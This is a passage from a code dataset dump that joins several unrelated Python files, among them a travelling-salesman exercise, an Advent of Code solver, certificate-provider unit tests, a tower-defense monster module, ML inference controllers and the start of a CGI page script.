ciudades de los archivos de entrada. De esos 100\n#recorridos encuentra el recorrido de menor longitud total y lo\n#grafica en un plano Longitud-Latitud donde cada ciudad está\n#representada por un punto y su nombre. Los pares de ciudades que\n#están conectadas en el recorrido se representan por una línea recta\n#en el plano Longitud-Latitud. La gráfica debe guardarse como\n#\"recorrido_mas_corto.png\". La función devuelve None. \n\n#Pueden usar la función shuffle de numpy\n#(https://docs.scipy.org/doc/numpy-1.15.0/reference/generated/numpy.random.shuffle.html) \n#Solamente son permitidas las funciones y métodos que aparezcan en los\n#videos vistos hasta ahora en el curso.  \n\n#El programa debe estar en un archivo llamado\n#\"ApellidoNombre_Ejercicio04.py\" donde Apellido y Nombre debe\n#reemplazarlos con su apellido y nombre. El archivo solamente debe\n#incluir los imports necesarios y las funciónes pedida. Suba ese\n#archivo como respuesta a esta actividad. \n\n#Al ejecutar \"python ApellidoNombre_Ejercicio04.py\" no se\n#debe producir ningún error, nada se debe imprimir en pantalla y\n#ningún archivo debe ser creado por el programa. \n\n#Para calificar el ejercicios vamos a llamar la función\n#encuentra_recorrido con dos nombres de archivos y contenidos\n#diferentes a los del video. Esos archivos contienen los datos de al\n#menos cuatro ciudades. \n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef lee_datos(archivo_coordenadas, archivo_nombres):\n coordenadas = np.loadtxt(archivo_coordenadas, delimiter=\",\")\n nombres = np.loadtxt(archivo_nombres, dtype=\"str\")\n return coordenadas, nombres\n\ndef genera_recorrido(nombres):\n n = len(nombres)\n r = np.arange(n-1)+1\n np.random.shuffle(r)\n r = [0] + list(r) + [0]\n return r\n\ndef calcula_distancia(coordenadas, a, b):\n latitud = coordenadas[:,0]\n longitud = coordenadas[:,1]\n\n phi = 90.0 - latitud\n theta = longitud\n theta[longitud<0] = 360.0 + longitud[longitud<0]\n\n phi = phi * np.pi/180.0\n theta = theta * np.pi/180.0\n\n psi = np.sin(phi[a])*np.sin(phi[b]) * np.cos(theta[a]-theta[b])\n psi = psi + np.cos(phi[a]) * np.cos(phi[b])\n psi = np.arccos(psi)\n rho = 6400.0\n return rho*psi\n\ndef calcula_distancia_total(coordenadas, recorrido):\n d = 0\n for i in range(len(recorrido)-1):\n d += calcula_distancia(coordenadas, recorrido[i], recorrido[i+1])\n return d\n\ndef encuentra_recorrido(archivo_coordenadas, archivo_nombres):\n coordenadas, nombres = lee_datos(archivo_coordenadas, archivo_nombres)\n\n d_min = 1E10\n r_min = []\n for i in range(100):\n r = genera_recorrido(nombres)\n d = calcula_distancia_total(coordenadas, r)\n if d < d_min:\n d_min = d\n r_min = r.copy()\n\n plt.figure()\n n_ciudades = len(nombres)\n for i in range(n_ciudades):\n plt.text(coordenadas[i,1], coordenadas[i,0], nombres[i])\n\n plt.scatter(coordenadas[r_min,1], coordenadas[r_min,0])\n plt.plot(coordenadas[r_min,1], coordenadas[r_min,0])\n\n plt.xlabel(\"Longitud [grados]\")\n plt.ylabel(\"Latitud [grados]\")\n plt.axis('equal')\n plt.savefig(\"recorrido_mas_corto.png\")\n\n return None\n\n","sub_path":"soluciones/ejercicio_04.py","file_name":"ejercicio_04.py","file_ext":"py","file_size_in_byte":5936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"461057084","text":"from collections import OrderedDict\n\ndef main():\n f = open('21-input.txt', 'r')\n lines = f.read().split('\\n')[:-1]\n f.close()\n\n foods = []\n allergens = []\n for line in lines:\n foods.append((line.split(' (')[0].split(' '), line.split('contains ')[1][:-1].split(', ')))\n allergens.extend(line.split('contains ')[1][:-1].split(', '))\n \n allergens = remove_duplicates(allergens)\n\n possibles = {}\n for allergen in allergens:\n allergen_foods = []\n ingredients = []\n for food in foods:\n if allergen in food[1]:\n allergen_foods.append(food[0])\n ingredients.extend(food[0])\n ingredients = remove_duplicates(ingredients)\n \n matching = []\n for ingredient in ingredients:\n failed = False\n for allergen_food in allergen_foods:\n if ingredient not in allergen_food:\n failed = True\n break\n if not failed:\n matching.append(ingredient)\n \n possibles[allergen] = matching\n\n finals = {}\n while len(finals) < len(possibles):\n for allergen, ingredients in possibles.items():\n if len(ingredients) == 1:\n finals[allergen] = ingredients[0]\n for key in possibles.keys():\n if key == allergen:\n continue\n if ingredients[0] in possibles[key]:\n possibles[key].remove(ingredients[0])\n\n bad = []\n ordered_finals = OrderedDict(sorted(finals.items()))\n for key, value in ordered_finals.items():\n bad.append(value)\n result = ','.join(bad)\n\n print('Result:', result)\n\ndef remove_duplicates(_list):\n temp = []\n for i in _list:\n if i not in temp:\n temp.append(i)\n return temp\n\nif __name__ == '__main__':\n main()\n\n# Result: \n","sub_path":"Day 21/21-2.py","file_name":"21-2.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"645004712","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the `provider` module.\"\"\"\n\nfrom unittest.mock import patch\n\nfrom certificate_validator.provider import (\n Provider, Request, RequestResourceProperties, RequestType, Response,\n Status\n)\n\nfrom .base import (\n BaseTestCase, ProviderBaseTestCase, RequestBaseTestCase,\n ResponseBaseTestCase\n)\n\n\nclass RequestTypeTestCase(BaseTestCase):\n def setUp(self):\n super(RequestTypeTestCase, self).setUp()\n\n def test_class(self):\n self.assertEqual('Create', RequestType.CREATE.value)\n self.assertEqual('Update', RequestType.UPDATE.value)\n self.assertEqual('Delete', RequestType.DELETE.value)\n\n\nclass StatusTestCase(BaseTestCase):\n def setUp(self):\n super(StatusTestCase, self).setUp()\n\n def test_class(self):\n self.assertEqual('SUCCESS', Status.SUCCESS.value)\n self.assertEqual('FAILED', Status.FAILED.value)\n\n\nclass RequestTestCase(RequestBaseTestCase):\n def setUp(self):\n super(RequestTestCase, self).setUp()\n\n def test_init(self):\n kwargs = {'a': 1, 'b': 2, 'c': 3}\n r = Request(**kwargs)\n self.assertEqual(1, r.a)\n self.assertEqual(2, r.b)\n self.assertEqual(3, r.c)\n self.assertEqual(Request.DEFAULT_REGION, r.region)\n\n def test_request_type(self):\n self.assertEqual('request_type', self.request.request_type)\n\n def test_service_token(self):\n self.assertEqual('service_token', self.request.service_token)\n\n def test_response_url(self):\n self.assertEqual('response_url', self.request.response_url)\n\n def test_stack_id(self):\n self.assertEqual('stack_id', self.request.stack_id)\n\n def test_request_id(self):\n self.assertEqual('request_id', self.request.request_id)\n\n def test_resource_type(self):\n self.assertEqual('resource_type', self.request.resource_type)\n\n def test_logical_resource_id(self):\n self.assertEqual(\n 'logical_resource_id', self.request.logical_resource_id\n )\n\n def test_physical_resource_id(self):\n self.assertEqual(\n 'physical_resource_id', self.request.physical_resource_id\n )\n kwargs = {}\n r = Request(**kwargs)\n self.assertEqual('', r.physical_resource_id)\n\n def test_resource_properties(self):\n self.assertEqual(\n 'service_token', self.request.resource_properties.service_token\n )\n\n def test_resource_properties_none(self):\n r = Request(ResourceProperties=None)\n properties = r.resource_properties\n self.assertIsInstance(properties, RequestResourceProperties)\n # TODO\n\n def test_old_resource_properties(self):\n self.assertEqual(\n 'service_token', self.request.old_resource_properties.service_token\n )\n\n def test_old_resource_properties_none(self):\n r = Request(OldResourceProperties=None)\n properties = r.old_resource_properties\n self.assertIsInstance(properties, RequestResourceProperties)\n # TODO\n\n def test_sans(self):\n kwargs = {\n 'ResourceProperties': {\n 'SubjectAlternativeNames': ['www.certificate-validator.com']\n }\n }\n r = Request(**kwargs)\n self.assertEqual(['www.certificate-validator.com'],\n r.resource_properties.sans)\n\n def test_old_sans(self):\n kwargs = {\n 'OldResourceProperties': {\n 'SubjectAlternativeNames': ['www.certificate-validator.com']\n }\n }\n r = Request(**kwargs)\n properties = r.resource_properties\n old_properties = r.old_resource_properties\n self.assertEqual([], properties.sans)\n self.assertEqual(['www.certificate-validator.com'],\n old_properties.sans)\n\n def test_sans_with_empty_only(self):\n self.assertEqual([], self.request.resource_properties.sans)\n for case in [None, [''], [None], ['', None], [None, '']]:\n kwargs = {'ResourceProperties': {'SubjectAlternativeNames': case}}\n r = Request(**kwargs)\n properties = r.resource_properties\n self.assertEqual([], properties.sans,\n \"Failed test. input %s, expected %s, got %s\" %\n (case, [], properties.sans))\n\n def test_sans_with_mixed(self):\n for case in [['', 'www.certificate-validator.com'],\n [None, 'www.certificate-validator.com'],\n ['www.certificate-validator.com', None],\n ['', 'www.certificate-validator.com', None],\n [None, '', 'www.certificate-validator.com']]:\n kwargs = {'ResourceProperties': {'SubjectAlternativeNames': case}}\n r = Request(**kwargs)\n properties = r.resource_properties\n sans = properties.sans\n self.assertEqual(['www.certificate-validator.com'], sans,\n \"Failed test. input %s, expected %s, got %s\" %\n (case, ['www.certificate-validator.com'], sans))\n\n def test_region_default(self):\n self.assertEqual(Request.DEFAULT_REGION, self.request.region)\n\n def test_region_caching(self):\n region = self.request.region\n self.mock_logger.warning.assert_called_with(\n \"Failed to parse stack ARN(%s) to get region - defaulting to %s\",\n 'stack_id', Request.DEFAULT_REGION\n )\n self.mock_logger.reset_mock()\n region2 = self.request.region\n self.mock_logger.warning.assert_not_called()\n self.assertIs(region, region2)\n self.assertEqual(Request.DEFAULT_REGION, self.request.region)\n\n def test_region_from_arn(self):\n for region in ['us-west-1', 'us-east-1', 'us-west-2', 'ap-south-1']:\n kwargs = {\n \"StackId\":\n \"arn:aws:cloudformation:{}:{}:stack/stackname/guid\".format(\n region, '123456789012'\n )\n }\n r = Request(**kwargs)\n actual = r.region\n self.assertEqual(\n region, actual, \"Expected %s, got %s\" % (region, actual)\n )\n\n\nclass ResponseTestCase(ResponseBaseTestCase):\n def setUp(self):\n super(ResponseTestCase, self).setUp()\n\n def test_init(self):\n kwargs = {'a': 1, 'b': 2, 'c': 3}\n r = Response(**kwargs)\n self.assertEqual(1, r.a)\n self.assertEqual(2, r.b)\n self.assertEqual(3, r.c)\n r = Response(\n request_id='request_id',\n stack_id='stack_id',\n logical_resource_id='logical_resource_id'\n )\n self.assertEqual('request_id', r.request_id)\n self.assertEqual('stack_id', r.stack_id)\n self.assertEqual('logical_resource_id', r.logical_resource_id)\n self.assertEqual('', r.physical_resource_id)\n r = Response(\n request_id='request_id',\n stack_id='stack_id',\n logical_resource_id='logical_resource_id',\n physical_resource_id='physical_resource_id'\n )\n self.assertEqual('request_id', r.request_id)\n self.assertEqual('stack_id', r.stack_id)\n self.assertEqual('logical_resource_id', r.logical_resource_id)\n self.assertEqual('physical_resource_id', r.physical_resource_id)\n\n def test_status(self):\n self.assertEqual('status', self.response.status)\n\n def test_reason(self):\n self.assertEqual('reason', self.response.reason)\n\n def test_stack_id(self):\n self.assertEqual('stack_id', self.response.stack_id)\n\n def test_request_id(self):\n self.assertEqual('request_id', self.response.request_id)\n\n def test_logical_resource_id(self):\n self.assertEqual(\n 'logical_resource_id', self.response.logical_resource_id\n )\n\n def test_physical_resource_id(self):\n self.assertEqual(\n 'physical_resource_id', self.response.physical_resource_id\n )\n\n def test_no_echo(self):\n self.assertEqual(True, self.response.no_echo)\n\n def test_data(self):\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, self.response.data)\n\n def test_set_status(self):\n self.response.set_status(True)\n self.assertEqual('SUCCESS', self.response.status)\n self.response.set_status(False)\n self.assertEqual('FAILED', self.response.status)\n\n def test_set_reason(self):\n self.response.set_reason('')\n self.assertEqual('', self.response.reason)\n\n def test_set_physical_resource_id(self):\n self.response.set_physical_resource_id('1337')\n self.assertEqual('1337', self.response.physical_resource_id)\n\n def test_set_data(self):\n self.response.set_data({'a': 1, 'b': 2, 'c': 3})\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, self.response.data)\n kwargs = {}\n r = Response(**kwargs)\n r.set_data({'a': 1, 'b': 2, 'c': 3})\n self.assertEqual({'a': 1, 'b': 2, 'c': 3}, r.data)\n\n def test_dict(self):\n self.kwargs = self.response.dict()\n\n\nclass ProviderTestCase(ProviderBaseTestCase):\n def setUp(self):\n super(ProviderTestCase, self).setUp()\n\n def test_init(self):\n self.assertEqual(self.provider.request, self.request)\n self.assertEqual(self.provider.response, self.response)\n\n def test_set_response(self):\n r = Response()\n self.provider._set_response(r)\n self.assertEqual(r, self.provider.response)\n\n def test_create(self):\n with self.assertRaises(NotImplementedError):\n self.provider.create()\n\n def test_update(self):\n with self.assertRaises(NotImplementedError):\n self.provider.update()\n\n def test_delete(self):\n with self.assertRaises(NotImplementedError):\n self.provider.delete()\n\n def test_handler_create(self):\n self.mock_create = patch.object(Provider, 'create').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Create'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_create.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_update(self):\n self.mock_update = patch.object(Provider, 'update').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Update'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_update.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_delete(self):\n self.mock_delete = patch.object(Provider, 'delete').start()\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Delete'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.mock_delete.assert_called_once()\n self.mock_send_response.assert_called_once()\n\n def test_handler_unknown(self):\n self.mock_send_response = patch.object(Provider,\n 'send_response').start()\n self.request_kwargs['RequestType'] = 'Unknown'\n request = Request(**self.request_kwargs)\n provider = Provider(request, self.response)\n provider.handler()\n self.assertEqual('FAILED', self.provider.response.status)\n self.assertEqual(\n 'Unknown RequestType: Must be one of: Create, Update, or Delete.',\n self.provider.response.reason\n )\n self.mock_send_response.assert_called_once()\n\n def test_send_response(self):\n self.provider.send_response()\n self.mock_requests.put.assert_called_with(\n 'response_url',\n json=self.provider.response.dict(),\n headers={'Content-Type': ''}\n )\n","sub_path":"certificate_validator/tests/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":12291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497804475","text":"from torch.autograd import Variable\nimport numpy as np\nimport os\nimport sys\ncurrent_dir = os.path.dirname(os.path.abspath(\"__file__\"))\nsys.path.append( str(current_dir) + '/../../../' )\n\nfrom setting_param import prediction_num_of_node_max_new as max_new\nfrom setting_param import prediction_num_of_node_min_new as min_new\nfrom setting_param import prediction_num_of_node_max_lost as max_lost\nfrom setting_param import prediction_num_of_node_min_lost as min_lost\n\ndef inference(dataloader, net, criterion, opt, OutputDir, node_type):\n net.eval()\n for i, (sample_idx, input_new, input_lost, label_new, label_lost) in enumerate(dataloader, 0):\n\n if opt.cuda:\n input_new = input_new.cuda()\n input_lost = input_lost.cuda()\n label_new = label_new.cuda()\n label_lost = label_lost.cuda()\n\n if node_type == \"new\":\n input = Variable(input_new).double()\n target = Variable(label_new).double()\n max_ = max_new\n min_ = min_new\n elif node_type == \"lost\":\n input = Variable(input_lost).double()\n target = Variable(label_lost).double()\n max_ = max_lost\n min_ = min_lost\n\n output = net(input)\n\n # 予測結果とラベルを保存\n os.makedirs(OutputDir + \"/output\", exist_ok=True)\n for batch in range(opt.batchSize):\n np.save(OutputDir + \"/output/pred\" + str(sample_idx.numpy()[batch]), output.detach().numpy()[batch] * (max_ - min_) + min_)\n np.save(OutputDir + \"/output/true\" + str(sample_idx.numpy()[batch]), target[batch].numpy() * (max_ - min_) + min_)\n","sub_path":"Model/prediction_num_of_node/LSTM/utils/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327047118","text":"from collections import deque\r\n#import sympy.geometry as g\r\nimport Geometry as geo\r\n\r\nMAX_MONSTER_SPEED = 21\r\nMIN_MONSTER_SPEED = 21\r\n\r\n\r\nclass MonsterWay: # todo normal point now tuple with pairs x y\r\n def __init__(self):\r\n self.way = ((1, 1), (2, 1), (3, 1), (4, 1), (5, 1), (6, 1), (7, 1), (8, 1), (9, 1), (10, 1), (11, 1),\r\n (12, 1), (13, 1), (14, 1), (15, 1), (16, 1), (17, 1), (18, 1), (18, 2), (18, 3), (18, 4),\r\n (18, 5), (18, 6), (18, 7), (18, 8), (18, 9), (18, 10), (17, 10), (16, 10), (15, 10), (14, 10),\r\n (13, 10), (12, 10), (11, 10), (10, 10), (9, 10), (8, 10), (7, 10), (6, 10), (5, 9), (4, 8),\r\n (3, 8), (2, 8), (1, 8), (0, 8), (0, 9), (0, 10), (0, 11), (0, 12), (0, 13), (0, 14), (0, 15),\r\n (0, 16), (0, 17), (1, 18), (2, 20), (2, 21), (3, 22), (4, 23), (5, 24), (6, 25), (7, 26), (8, 27),\r\n (9, 28), (10, 29), (11, 30), (12, 31), (13, 32), (14, 33), (15, 34), (16, 35), (17, 35), (18, 35),\r\n (19, 35), (20, 35), (21, 35), (22, 35), (23, 35), (24, 35), (25, 35), (25, 35), (26, 35),\r\n (27, 35), (28, 35), (29, 35), (30, 35), (31, 35), (32, 35), (33, 35), (34, 35), (35, 35), (36, 35),\r\n (37, 35), (38, 35), (39, 35), (40, 35), (41, 35), (42, 35), (42, 35), (43, 35), (44, 35), (45, 35),\r\n (46, 35), (47, 35), (48, 35), (49, 35), (50, 35), (51, 34), (52, 33), (53, 32), (54, 31), (55, 30),\r\n (56, 29), (57, 28), (58, 27), (59, 26), (60, 25), (61, 25)\r\n )\r\n self.lobby = 2\r\n self.city = len(self.way) - 2\r\n\r\n def in_lobby(self, index):\r\n return index < self.lobby\r\n\r\n def in_city(self, index):\r\n return index > self.city\r\n\r\n def x(self, index):\r\n return self.way[index][0] # todo this safety with processing\r\n\r\n def y(self, index):\r\n return self.way[index][1]\r\n\r\n\r\nclass MonsterWave:\r\n def __init__(self, world, monster_amount, monster_time_interval):\r\n self.monster_way = MonsterWay()\r\n self.monsters_lobby = deque(Monster(world, self, -5, -5) for _ in range(0, monster_amount))\r\n self.monster_time_interval = monster_time_interval\r\n self.monsters_on_map = [] # deque()\r\n self.world = world\r\n self.alive = True\r\n\r\n self.health_on_map = 0\r\n self.monster_wave_health = len(self.monsters_lobby) * 20 + self.health_on_map\r\n\r\n def add_on_map(self):\r\n if self.monsters_lobby and self.world.draw_system.draw_tick % self.monster_time_interval == 0:\r\n self.monsters_on_map.append(self.monsters_lobby.popleft())\r\n\r\n def refresh_on_map(self):\r\n for monster in self.monsters_on_map:\r\n if not monster.alive:\r\n if monster.monster_loot:\r\n self.world.player.monsters_loots.append(monster.monster_loot)\r\n monster.monster_loot = None\r\n self.monsters_on_map.remove(monster)\r\n monster.refresh()\r\n self.health_on_map += max(int(monster.health), 0)\r\n self.monster_wave_health = len(self.monsters_lobby) * 20 + self.health_on_map\r\n self.health_on_map = 0\r\n self.world.player.wave_health = self.monster_wave_health\r\n\r\n def refresh(self):\r\n self.add_on_map()\r\n self.refresh_on_map()\r\n if not (self.monsters_lobby or self.monsters_on_map):\r\n self.alive = False\r\n\r\n\r\nclass MonsterArmor:\r\n def __init__(self, monster, monster_armor):\r\n self.froze = monster_armor[\"Froze\"]\r\n self.fire = monster_armor[\"Fire\"]\r\n self.poison = monster_armor[\"Poison\"]\r\n self.electricity = monster_armor[\"Electricity\"]\r\n self.physical = monster_armor[\"Physical\"]\r\n self.monster = monster\r\n\r\n\r\nclass MonsterLoot:\r\n def __init__(self, monster):\r\n self.monster = monster\r\n self.money = 10\r\n self.citizen_annihilation = 1\r\n self.experience = 5\r\n self.in_city = False\r\n self.available = True\r\n\r\n\r\nclass MonsterEffects:\r\n def __init__(self, monster):\r\n self.froze = 0\r\n self.fire = 0\r\n self.poison = 0\r\n self.electricity = 0\r\n self.slowing = 5\r\n self.direction = 1\r\n self.towers_attacks = []\r\n self.damage = 0\r\n self.monster = monster\r\n\r\n def _effects_collecting(self):\r\n for tower_attack in self.towers_attacks:\r\n electricity = tower_attack.electricity_attack - self.monster.armor.electricity\r\n poison = tower_attack.poison_attack - self.monster.armor.poison\r\n fire = tower_attack.fire_attack - self.monster.armor.fire\r\n froze = tower_attack.froze_attack - self.monster.armor.fire\r\n damage = tower_attack.physical_attack - self.monster.armor.physical\r\n self.slowing += tower_attack.slowing_change\r\n self.direction = tower_attack.direction_change\r\n self.electricity += max(electricity, 0)\r\n self.poison += max(poison, 0)\r\n self.froze += max(froze, 0)\r\n self.fire += max(fire, 0)\r\n self.damage += max(damage, 0)\r\n self.towers_attacks = []\r\n\r\n def _effects_calculation(self):\r\n effcoff = {\"electricity\": self.electricity, \"froze\": self.froze, \"poison\": self.poison, \"fire\": self.fire}\r\n elecoff = {\"electricity\": 0, \"froze\": 0.33, \"poison\": -0.17, \"fire\": -0.13}\r\n fircoff = {\"electricity\": 0.46, \"froze\": -1, \"poison\": 0.08, \"fire\": 0}\r\n frocoff = {\"electricity\": 0.193, \"froze\": 0, \"poison\": 0, \"fire\": -1}\r\n poicoff = {\"electricity\": -0.17, \"froze\": -0.37, \"poison\": 0, \"fire\": -0.3}\r\n slocoff = {\"electricity\": -0.33, \"froze\": 0.83, \"poison\": 0, \"fire\": -0.43}\r\n dmgcoff = {\"electricity\": 0.76, \"froze\": 0.56, \"poison\": 0.86, \"fire\": 0.63}\r\n electricity = sum(map(lambda x, y: x * y, effcoff.values(), elecoff.values()))\r\n fire = sum(map(lambda x, y: x * y, effcoff.values(), fircoff.values()))\r\n froze = sum(map(lambda x, y: x * y, effcoff.values(), frocoff.values()))\r\n poison = sum(map(lambda x, y: x * y, effcoff.values(), poicoff.values()))\r\n slowing = sum(map(lambda x, y: x * y, effcoff.values(), slocoff.values()))\r\n self.slowing += slowing\r\n self.electricity = max(self.electricity + electricity, 0)\r\n self.poison = max(self.poison + poison, 0)\r\n self.froze = max(self.froze + froze, 0)\r\n self.fire = max(self.fire + fire, 0)\r\n effcoff = {\"electricity\": self.electricity, \"froze\": self.froze, \"poison\": self.poison, \"fire\": self.fire}\r\n damage = sum(map(lambda x, y: x * y, effcoff.values(), dmgcoff.values()))\r\n self.damage += damage\r\n\r\n def _tick_effects_update(self):\r\n self.damage = 0\r\n self.poison *= 0.88\r\n self.froze *= 0.67\r\n self.fire *= 0.44\r\n self.electricity *= 0.2\r\n self.slowing *= 0.76\r\n if self.monster.world.draw_system.draw_tick % 200 == 0:\r\n self.direction = 1\r\n else:\r\n self.direction = self.direction\r\n\r\n def refresh_effects(self):\r\n self._effects_collecting()\r\n self._effects_calculation()\r\n self.monster.health -= self.damage\r\n\r\n self.monster.speed_now = self.monster.speed_base - int(self.slowing + 0.5) # TODO make armotization for this\r\n self._tick_effects_update()\r\n\r\n\r\nclass Monster:\r\n def __init__(self, world, wave, x, y):\r\n self.world = world\r\n self.wave = wave\r\n self.x = x\r\n self.y = y\r\n self.width = 2\r\n self.height = 2\r\n self.polygon = self._init_polygon()\r\n self._speed_base = None\r\n self._speed_now = None\r\n self.speed_base = 5\r\n self.speed_now = self._speed_base\r\n self.health = 20\r\n self.monster_loot = MonsterLoot(self)\r\n self.lived_ticks = 0\r\n self.alive = True\r\n self.armor = MonsterArmor(self, {\"Froze\": 0, \"Fire\": 0, \"Poison\": 0, \"Electricity\": 0, \"Physical\": 0})\r\n self.texture = \"M\"\r\n self.effects = MonsterEffects(self)\r\n self.type = \"all\"\r\n self.ai_points = 0\r\n self.way_position = 0\r\n self.monster_way = wave.monster_way\r\n self.step = 1\r\n # in future it resizing objects configure\r\n\r\n @property\r\n def speed_base(self):\r\n return self._speed_base\r\n\r\n @speed_base.setter\r\n def speed_base(self, speed_base):\r\n self._speed_base = max(-MIN_MONSTER_SPEED, min(speed_base, MAX_MONSTER_SPEED - 1))\r\n\r\n @property\r\n def speed_now(self):\r\n return self._speed_now\r\n\r\n @speed_now.setter\r\n def speed_now(self, speed_now):\r\n self._speed_now = min(MIN_MONSTER_SPEED + MAX_MONSTER_SPEED - 2, max(MAX_MONSTER_SPEED - speed_now, 1))\r\n\r\n def is_can_be_attacked(self, typeof):\r\n return typeof in (\"all\", self.type) and self.alive\r\n\r\n def _init_polygon(self):\r\n x = self.x\r\n y = self.y\r\n w = self.width - 1\r\n h = self.height - 1\r\n return geo.Rectangle(x,y,w,h)#//g.polygon.Polygon(g.Point(x, y), g.Point(x + w, y), g.Point(x + w, y + h), g.Point(x, y + h))\r\n\r\n def refresh(self):\r\n if not self.alive:\r\n return\r\n self.polygon = self._init_polygon()\r\n self.effects.refresh_effects()\r\n self.lived_ticks += 1\r\n self.lived_ticks %= 100\r\n self.refresh_ai()\r\n if self.health < 1:\r\n self.alive = False\r\n self.x = -1\r\n self.y = -1\r\n\r\n def refresh_ai(self):\r\n if self.monster_way.in_city(self.way_position):\r\n self.monster_loot.in_city = True\r\n self.effects.Direction = 0\r\n self.alive = False\r\n if self.world.draw_system.draw_tick % self.speed_now == 0:\r\n self.lived_ticks += 1\r\n self.lived_ticks %= 100\r\n if self.monster_way.in_lobby(self.way_position):\r\n self.effects.Direction = 1\r\n self.move()\r\n\r\n def _movement(self, x, y):\r\n if self.alive:\r\n self.x += x\r\n self.y += y\r\n\r\n def move(self):\r\n self.way_position += self.step * self.effects.direction\r\n self.x = self.monster_way.x(self.way_position)\r\n self.y = self.monster_way.y(self.way_position)\r\n\r\n def in_screen(self, window_width, window_height):\r\n return 0 <= self.x <= window_width + self.width and 0 <= self.y <= window_height + self.height and self.alive\r\n\r\n def effect_on_tick(self):\r\n pass\r\n","sub_path":"Monsters.py","file_name":"Monsters.py","file_ext":"py","file_size_in_byte":10604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42124548","text":"import sys\nsys.path.append('../')\nfrom utilities.utils import ModelUtils\nfrom logger.logger import Logger\nfrom db_operations.sqlite_db import SqliteDbHandler\nfrom utilities.utils import FileUtils\nimport os\nfrom joblib import dump, load\nfrom datetime import datetime\nimport more_itertools\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\n\n\n\nclass Inference_Controller:\n def __init__(self,inference_db_path,preprocessor):\n self._inference_db_path = inference_db_path\n self._time_created = datetime.now()\n self._logger = Logger(f'inferencing_logs_{self._time_created.date()}_{self._time_created.strftime(\"%H%M%S\")}.log')\n self._db_handler = SqliteDbHandler(self._logger,self._inference_db_path,'inferencing_db')\n self._model_utils = ModelUtils(self._logger)\n self._preprocessor = preprocessor\n\n def _load_data(self):\n self._logger.log('Inference: Started Inferencing')\n self._logger.log('Inference: Loading data for Inferencing')\n try: \n self._db_handler.create_db_connection()\n df = self._db_handler.get_data_from_db('thyroid_inferencing')\n return df\n except Exception as e:\n self._logger.log(f'Inference: Exception occured while Loading data for Inferencing, {str(e)}')\n\n def _cluster_data(self,df):\n\n clustering_model_name_with_extension = self._all_models[0]\n model_name_only = clustering_model_name_with_extension.split('.')[0]\n clustering_model = self._model_utils.load_model(model_name_only)\n \n clusters = clustering_model.predict(df)\n df['clusters']=clusters\n self._clusters=df['clusters'].unique()\n\n return df\n \n def _get_model_for_clusters(self):\n \n model_repository = {}\n for cluster in self._clusters:\n model_repository[cluster]=self._model_utils.find_model_for_cluster(cluster)\n \n return model_repository\n\n def _get_label_encoder(self):\n return self._preprocessor.label_encoder\n\n def _make_predictions_for_clusters(self,df):\n\n label_encoder = self._get_label_encoder()\n all_models = self._get_model_for_clusters()\n\n final_predictions = pd.DataFrame()\n for cluster in self._clusters:\n current_cluster_data = df[df['clusters']==cluster]\n current_cluster_data = current_cluster_data.drop(['clusters'],axis=1)\n model = all_models.get(cluster)\n predicted_labels = model.predict(current_cluster_data)\n predicted_labels = predicted_labels.astype(int)\n predicted_labels = label_encoder.inverse_transform(predicted_labels)\n current_cluster_data['predictions'] = predicted_labels\n final_predictions = pd.concat([final_predictions,current_cluster_data])\n \n return final_predictions\n\n\n\n def run_inferencing(self):\n with st.spinner(\"Loading validated data from DB...\"):\n df = self._load_data()\n\n with st.spinner(\"Loading models from repository...\"):\n # self._all_models = list(more_itertools.flatten(self._model_utils.get_all_models_info()))\n self._all_models = self._model_utils.get_all_models_info()\n\n with st.spinner('Clustering data'):\n df = self._cluster_data(df)\n\n with st.spinner('Getting Predictions..'):\n st.info('Predictions:')\n final_predictions = self._make_predictions_for_clusters(df)\n st.write(final_predictions)\n\n with st.spinner('Writing Predictions to file..'):\n # file_utils = FileUtils(self._logger,os.path.join('.','data'))\n # predictions_save_path = file_utils.create('final_predictions',delete_before_creation=True)\n # predictions_save_path= os.path.join(predictions_save_path,'predictions.csv')\n final_predictions.to_csv('./data/final_predictions/predictions.csv',index=False)\n\n","sub_path":"Machine_Learning_Projects/Thyroid_Detection/inference/inference_controller.py","file_name":"inference_controller.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"547401003","text":"#!/usr/bin/env python\nimport cgi\nimport cgitb\ncgitb.enable()\nimport os\nimport datetime\n\n\ndefault = \"No Value Present\"\n\n\nprint(\"Content-Type: text/html\")\nprint(\"\")\n\nthis_day = datetime.datetime.today()\n\nbody = \"\"\"\n\nLab 1 - CGI experiments by Dennis Lee\n\n\n

    Hey there, this page has been generated by {software}, running {script}.

    \n

    Today is {month} {date}, {year}.

    \n

    This page was requested by IP Address {client_ip}.

